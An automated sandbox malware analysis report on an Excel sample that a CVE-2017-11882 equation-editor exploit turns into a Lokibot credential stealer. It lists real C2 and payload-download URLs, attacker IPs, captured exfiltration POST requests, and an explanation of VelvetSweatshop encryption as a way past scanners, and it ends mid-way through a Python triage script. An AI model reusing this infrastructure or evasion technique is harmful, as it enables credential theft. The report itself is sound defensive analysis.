
Analysis Report MV FORTUNE TRADER.xlsx

Overview

General Information

Sample Name: MV FORTUNE TRADER.xlsx
Analysis ID: 353332
MD5: b9d2e20a706f5dccd80cbfca09685732
SHA1: b3d2b8eaa620398c83ff203c3c705d03dad55288
SHA256: 132f5ce3c879259992351ae90865928ed508f5a76ab3f97ce6cd624ecccb551d
Tags: VelvetSweatshop, xlsx

Detection

Lokibot
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Lokibot
C2 URLs / IPs found in malware configuration
Drops PE files to the user root directory
Machine Learning detection for dropped file
Office equation editor drops PE file
Office equation editor starts processes (likely CVE-2017-11882 or CVE-2018-0802)
Sigma detected: Executables Started in Suspicious Folder
Sigma detected: Execution in Non-Executable Folder
Sigma detected: Suspicious Program Location Process Starts
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file access)
Tries to steal Mail credentials (via file registry)
Yara detected aPLib compressed binary
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document misses a certain OLE stream usually present in this Microsoft Office document type
Downloads executable code via HTTP
Drops PE files
Drops PE files to the user directory
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Searches the installation path of Mozilla Firefox
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Startup

  • System is w7x64
  • EXCEL.EXE (PID: 944 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
  • EQNEDT32.EXE (PID: 2344 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • vbc.exe (PID: 1276 cmdline: 'C:\Users\Public\vbc.exe' MD5: 2559B5B8D60DD663DF52D0570F5973A9)
  • cleanup

Malware Configuration

Threatname: Lokibot

{"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "http://becharnise.ir/fa13/fre.php"]}

Yara Overview

PCAP (Network Traffic)

Source | Rule | Description | Author | Strings
dump.pcap | JoeSecurity_Lokibot_1 | Yara detected Lokibot | Joe Security |

Memory Dumps

Source | Rule | Description | Author | Strings
00000004.00000002.2374661998.0000000000220000.00000040.00000001.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
00000004.00000002.2374661998.0000000000220000.00000040.00000001.sdmp | JoeSecurity_aPLib_compressed_binary | Yara detected aPLib compressed binary | Joe Security |
00000004.00000002.2374661998.0000000000220000.00000040.00000001.sdmp | JoeSecurity_Lokibot | Yara detected Lokibot | Joe Security |
00000004.00000002.2374661998.0000000000220000.00000040.00000001.sdmp | Lokibot | detect Lokibot in memory | JPCERT/CC Incident Response Group |
  • 0x13e4f:$des3: 68 03 66 00 00
  • 0x18240:$param: MAC=%02X%02X%02XINSTALL=%08X%08X
  • 0x1830c:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
00000004.00000003.2160266537.0000000000240000.00000004.00000001.sdmp | SUSP_XORed_URL_in_EXE | Detects an XORed URL in an executable | Florian Roth |
  • 0x13e78:$s1: http://
  • 0x17633:$s1: http://
  • 0x18074:$s1: \x97\x8B\x8B\x8F\xC5\xD0\xD0
  • 0x13e80:$s2: https://
  • 0x13e78:$f1: http://
  • 0x17633:$f1: http://
  • 0x13e80:$f2: https://

Unpacked PEs

Source | Rule | Description | Author | Strings
4.3.vbc.exe.240000.0.unpack | SUSP_XORed_URL_in_EXE | Detects an XORed URL in an executable | Florian Roth |
  • 0x13278:$s1: http://
  • 0x16233:$s1: http://
  • 0x16c74:$s1: \x97\x8B\x8B\x8F\xC5\xD0\xD0
  • 0x13280:$s2: https://
  • 0x13278:$f1: http://
  • 0x16233:$f1: http://
  • 0x13280:$f2: https://
4.3.vbc.exe.240000.0.unpack | JoeSecurity_aPLib_compressed_binary | Yara detected aPLib compressed binary | Joe Security |
4.3.vbc.exe.240000.0.unpack | Loki_1 | Loki Payload | kevoreilly |
  • 0x131b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW
  • 0x133fc:$a2: last_compatible_version
4.3.vbc.exe.240000.0.unpack | Lokibot | detect Lokibot in memory | JPCERT/CC Incident Response Group |
  • 0x123ff:$des3: 68 03 66 00 00
  • 0x15ff0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X
  • 0x160bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
4.2.vbc.exe.220e50.0.unpack | SUSP_XORed_URL_in_EXE | Detects an XORed URL in an executable | Florian Roth |
  • 0x13278:$s1: http://
  • 0x16233:$s1: http://
  • 0x16c74:$s1: \x97\x8B\x8B\x8F\xC5\xD0\xD0
  • 0x13280:$s2: https://
  • 0x13278:$f1: http://
  • 0x16233:$f1: http://
  • 0x13280:$f2: https://

Sigma Overview

System Summary:

Sigma detected: Droppers Exploiting CVE-2017-11882
Source: Process started | Author: Florian Roth | Data: Command: 'C:\Users\Public\vbc.exe', CommandLine: 'C:\Users\Public\vbc.exe', CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2344, ProcessCommandLine: 'C:\Users\Public\vbc.exe', ProcessId: 1276
Sigma detected: EQNEDT32.EXE connecting to internet
Source: Network Connection | Author: Joe Security | Data: DestinationIp: 103.141.138.123, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2344, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49167
Sigma detected: File Dropped By EQNEDT32EXE
Source: File created | Author: Joe Security | Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2344, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\regasm[1].exe
Sigma detected: Executables Started in Suspicious Folder
Source: Process started | Author: Florian Roth | Data: Command: 'C:\Users\Public\vbc.exe', CommandLine: 'C:\Users\Public\vbc.exe', CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2344, ProcessCommandLine: 'C:\Users\Public\vbc.exe', ProcessId: 1276
Sigma detected: Execution in Non-Executable Folder
Source: Process started | Author: Florian Roth | Data: Command: 'C:\Users\Public\vbc.exe', CommandLine: 'C:\Users\Public\vbc.exe', CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2344, ProcessCommandLine: 'C:\Users\Public\vbc.exe', ProcessId: 1276
Sigma detected: Suspicious Program Location Process Starts
Source: Process started | Author: Florian Roth | Data: Command: 'C:\Users\Public\vbc.exe', CommandLine: 'C:\Users\Public\vbc.exe', CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2344, ProcessCommandLine: 'C:\Users\Public\vbc.exe', ProcessId: 1276

Signature Overview

AV Detection:

Antivirus detection for URL or domain
Source: http://stdyrusschinetwomast.dns.army/receiprt/regasm.exe | Avira URL Cloud: Label: malware
Found malware configuration
Source: 00000004.00000003.2160266537.0000000000240000.00000004.00000001.sdmp | Malware Configuration Extractor: Lokibot {"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "http://becharnise.ir/fa13/fre.php"]}
Multi AV Scanner detection for domain / URL
Source: becharnise.ir | Virustotal: Detection: 16%
Source: http://kbfvzoboss.bid/alien/fre.php | Virustotal: Detection: 14%
Source: http://alphastand.win/alien/fre.php | Virustotal: Detection: 9%
Source: http://alphastand.trade/alien/fre.php | Virustotal: Detection: 10%
Source: http://stdyrusschinetwomast.dns.army/receiprt/regasm.exe | Virustotal: Detection: 9%
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\regasm[1].exe | ReversingLabs: Detection: 36%
Source: C:\Users\Public\vbc.exe | ReversingLabs: Detection: 36%
Machine Learning detection for dropped file
Source: C:\Users\Public\vbc.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\regasm[1].exe | Joe Sandbox ML: detected

Exploits:

Office equation editor starts processes (likely CVE-2017-11882 or CVE-2018-0802)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Users\Public\vbc.exe
Source: unknown | Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding

Compliance:

Detected unpacking (overwrites its own PE header)
Source: C:\Users\Public\vbc.exe | Unpacked PE file: 4.2.vbc.exe.400000.1.unpack
Uses new MSVCR Dlls
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Uses secure TLS version for HTTPS connections
Source: unknown | HTTPS traffic detected: 172.67.8.238:443 -> 192.168.2.22:49165 version: TLS 1.2
Source: C:\Users\Public\vbc.exe | Code function: 4_2_00403D74 FindFirstFileW,
Source: global traffic | DNS query: name: cutt.ly
Source: global traffic | TCP traffic: 192.168.2.22:49165 -> 172.67.8.238:443
Source: global traffic | TCP traffic: 192.168.2.22:49165 -> 172.67.8.238:443

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.22:49168 -> 185.208.180.121:80
Source: Traffic | Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49168 -> 185.208.180.121:80
Source: Traffic | Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49168 -> 185.208.180.121:80
Source: Traffic | Snort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.22:49168 -> 185.208.180.121:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor | URLs: http://kbfvzoboss.bid/alien/fre.php
Source: Malware configuration extractor | URLs: http://alphastand.trade/alien/fre.php
Source: Malware configuration extractor | URLs: http://alphastand.win/alien/fre.php
Source: Malware configuration extractor | URLs: http://alphastand.top/alien/fre.php
Source: Malware configuration extractor | URLs: http://becharnise.ir/fa13/fre.php
Source: global traffic | HTTP traffic detected:
  HTTP/1.1 200 OK
  Date: Tue, 16 Feb 2021 06:02:42 GMT
  Server: Apache/2.4.34 (Win32) OpenSSL/1.0.2o PHP/5.6.38
  Last-Modified: Tue, 16 Feb 2021 01:44:33 GMT
  ETag: "41c00-5bb6a3e863566"
  Accept-Ranges: bytes
  Content-Length: 269312
  Keep-Alive: timeout=5, max=100
  Connection: Keep-Alive
  Content-Type: application/x-msdownload
Source: Joe Sandbox View | IP Address: 172.67.8.238
Source: Joe Sandbox View | IP Address: 103.141.138.123
Source: Joe Sandbox View | IP Address: 185.208.180.121
Source: Joe Sandbox View | ASN Name: VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN
Source: Joe Sandbox View | ASN Name: AMINIDCIR
Source: Joe Sandbox View | JA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
Source: global traffic | HTTP traffic detected:
  GET /receiprt/regasm.exe HTTP/1.1
  Accept: */*
  Accept-Encoding: gzip, deflate
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
  Connection: Keep-Alive
  Host: stdyrusschinetwomast.dns.army
Source: global traffic | HTTP traffic detected:
  POST /fa13/fre.php HTTP/1.0
  User-Agent: Mozilla/4.08 (Charon; Inferno)
  Host: becharnise.ir
  Accept: */*
  Content-Type: application/octet-stream
  Content-Encoding: binary
  Content-Key: 4081BD40
  Content-Length: 176
  Connection: close
Source: C:\Users\Public\vbc.exe | Code function: 4_2_00404ED4 recv,
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\83553F27.emf
Source: global traffic | HTTP traffic detected:
  GET /receiprt/regasm.exe HTTP/1.1
  Accept: */*
  Accept-Encoding: gzip, deflate
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
  Connection: Keep-Alive
  Host: stdyrusschinetwomast.dns.army
Source: unknown | DNS traffic detected: queries for: cutt.ly
Source: unknown | HTTP traffic detected:
  POST /fa13/fre.php HTTP/1.0
  User-Agent: Mozilla/4.08 (Charon; Inferno)
  Host: becharnise.ir
  Accept: */*
  Content-Type: application/octet-stream
  Content-Encoding: binary
  Content-Key: 4081BD40
  Content-Length: 176
  Connection: close
Source: vbc.exe | String found in binary or memory: http://becharnise.ir/fa13/fre.php
Source: 77EC63BDA74BD0D0E0426DC8F8008506.2.dr | String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: vbc.exe, 00000004.00000002.2375614676.0000000007200000.00000002.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: vbc.exe, 00000004.00000002.2375614676.0000000007200000.00000002.00000001.sdmp | String found in binary or memory: http://www.%s.comPA
Source: 83553F27.emf.0.dr | String found in binary or memory: http://www.day.com/dam/1.0
Source: vbc.exe, vbc.exe, 00000004.00000002.2374707642.0000000000400000.00000040.00020000.sdmp | String found in binary or memory: http://www.ibsensoftware.com/
Source: unknown | Network traffic detected: HTTP traffic on port 49165 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49165
Source: unknown | HTTPS traffic detected: 172.67.8.238:443 -> 192.168.2.22:49165 version: TLS 1.2

System Summary:

Malicious sample detected (through community Yara rule)
Source: 00000004.00000002.2374661998.0000000000220000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Lokibot in memory | Author: JPCERT/CC Incident Response Group
Source: 00000004.00000003.2160266537.0000000000240000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Loki Payload | Author: kevoreilly
Source: 00000004.00000003.2160266537.0000000000240000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Lokibot in memory | Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.2374707642.0000000000400000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Loki Payload | Author: kevoreilly
Source: 00000004.00000002.2374707642.0000000000400000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Lokibot in memory | Author: JPCERT/CC Incident Response Group
Source: 4.3.vbc.exe.240000.0.unpack, type: UNPACKEDPE | Matched rule: Loki Payload | Author: kevoreilly
Source: 4.3.vbc.exe.240000.0.unpack, type: UNPACKEDPE | Matched rule: detect Lokibot in memory | Author: JPCERT/CC Incident Response Group
Source: 4.2.vbc.exe.220e50.0.unpack, type: UNPACKEDPE | Matched rule: Loki Payload | Author: kevoreilly
Source: 4.2.vbc.exe.220e50.0.unpack, type: UNPACKEDPE | Matched rule: detect Lokibot in memory | Author: JPCERT/CC Incident Response Group
Source: 4.2.vbc.exe.220e50.0.raw.unpack, type: UNPACKEDPE | Matched rule: Loki Payload | Author: kevoreilly
Source: 4.2.vbc.exe.220e50.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Lokibot in memory | Author: JPCERT/CC Incident Response Group
Source: 4.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Loki Payload | Author: kevoreilly
Source: 4.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE | Matched rule: detect Lokibot in memory | Author: JPCERT/CC Incident Response Group
Source: 4.3.vbc.exe.240000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Loki Payload | Author: kevoreilly
Source: 4.3.vbc.exe.240000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Lokibot in memory | Author: JPCERT/CC Incident Response Group
Source: 4.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE | Matched rule: Loki Payload | Author: kevoreilly
Source: 4.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE | Matched rule: detect Lokibot in memory | Author: JPCERT/CC Incident Response Group
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Screenshot number: 4 | Screenshot OCR: Enable Editing from the , , yellow bar above 21 This document is 22 ? protected 3 Once you have e
Source: Screenshot number: 4 | Screenshot OCR: Enable Content from the yellow bar above 24 25 26 27 28 29 lh\ Auv i r g prL?'tya vu a og u43
Office equation editor drops PE file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\regasm[1].exe
Source: C:\Users\Public\vbc.exe | Memory allocated: 76E20000 page execute and read and write
Source: C:\Users\Public\vbc.exe | Memory allocated: 76D20000 page execute and read and write
Source: C:\Users\Public\vbc.exe | Code function: 4_2_0040549C
Source: C:\Users\Public\vbc.exe | Code function: 4_2_004029D4
Source: C:\Users\Public\vbc.exe | Code function: 4_2_00222C24
Source: C:\Users\Public\vbc.exe | Code function: 4_2_002256EC
Source: MV FORTUNE TRADER.xlsx | OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: C:\Users\Public\vbc.exe | Code function: String function: 0041219C appears 45 times
Source: C:\Users\Public\vbc.exe | Code function: String function: 00405B6F appears 42 times
Source: C:\Users\Public\vbc.exe | Registry key queried: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Mozilla\Mozilla Firefox\52.0.1 (x86 en-US)\Main Install Directory
Source: 00000004.00000002.2374661998.0000000000220000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000003.2160266537.0000000000240000.00000004.00000001.sdmp, type: MEMORY | Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score =
Source: 00000004.00000003.2160266537.0000000000240000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 00000004.00000003.2160266537.0000000000240000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.2374707642.0000000000400000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 00000004.00000002.2374707642.0000000000400000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 4.3.vbc.exe.240000.0.unpack, type: UNPACKEDPE | Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score =
Source: 4.3.vbc.exe.240000.0.unpack, type: UNPACKEDPE | Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 4.3.vbc.exe.240000.0.unpack, type: UNPACKEDPE | Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 4.2.vbc.exe.220e50.0.unpack, type: UNPACKEDPE | Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score =
Source: 4.2.vbc.exe.220e50.0.unpack, type: UNPACKEDPE | Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 4.2.vbc.exe.220e50.0.unpack, type: UNPACKEDPE | Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 4.2.vbc.exe.220e50.0.raw.unpack, type: UNPACKEDPE | Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score =
Source: 4.3.vbc.exe.240000.0.raw.unpack, type: UNPACKEDPE | Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score =
Source: 4.2.vbc.exe.220e50.0.raw.unpack, type: UNPACKEDPE | Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 4.2.vbc.exe.220e50.0.raw.unpack, type: UNPACKEDPE | Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 4.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 4.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 4.3.vbc.exe.240000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 4.3.vbc.exe.240000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 4.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE | Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 4.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE | Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
            Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winXLSX@4/14@3/3
            Source: C:\Users\Public\vbc.exeCode function: 4_2_0040434D CoInitialize,CoCreateInstance,VariantInit,SysAllocString,VariantInit,VariantInit,SysAllocString,VariantInit,SysFreeString,SysFreeString,CoUninitialize,
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$MV FORTUNE TRADER.xlsxJump to behavior
            Source: C:\Users\Public\vbc.exeMutant created: \Sessions\1\BaseNamedObjects\DE4229FCF97F5879F50F8FD3
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR138.tmpJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\Public\vbc.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
            Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
            Source: unknownProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
            Source: MV FORTUNE TRADER.xlsxStatic file information: File size 2551296 > 1048576
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
            Source: MV FORTUNE TRADER.xlsxInitial sample: OLE indicators vbamacros = False
            Source: MV FORTUNE TRADER.xlsxInitial sample: OLE indicators encrypted = True
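The two "Initial sample" indicators above (OLE container, no VBA macros, encrypted = True), together with the EncryptedPackage stream entropy of 7.9999 reported further down, describe a password-encrypted OOXML workbook rather than a plain zip. Excel opens such a file without any prompt when it was encrypted with the built-in default password VelvetSweatshop, so the equation-editor exploit object this report flags stays invisible to static scanners that do not decrypt first (consistent with "No Antivirus matches" on the initial sample below). The following Python is an added example, not Joe Sandbox code: it takes a dict of OLE stream names to bytes (filling that dict from the real file, e.g. with olefile, is left outside the block so it runs offline), classifies the EncryptionInfo version header per MS-OFFCRYPTO and measures the ciphertext entropy. The sample streams are constructed and are not taken from the real file.

```python
"""Triage an OLE container for a password-encrypted OOXML package.

Added example, not Joe Sandbox code. Input is a dict of OLE stream
name -> bytes (fill it from olefile or similar; not done here so the
block runs offline). Layout facts are from MS-OFFCRYPTO: the
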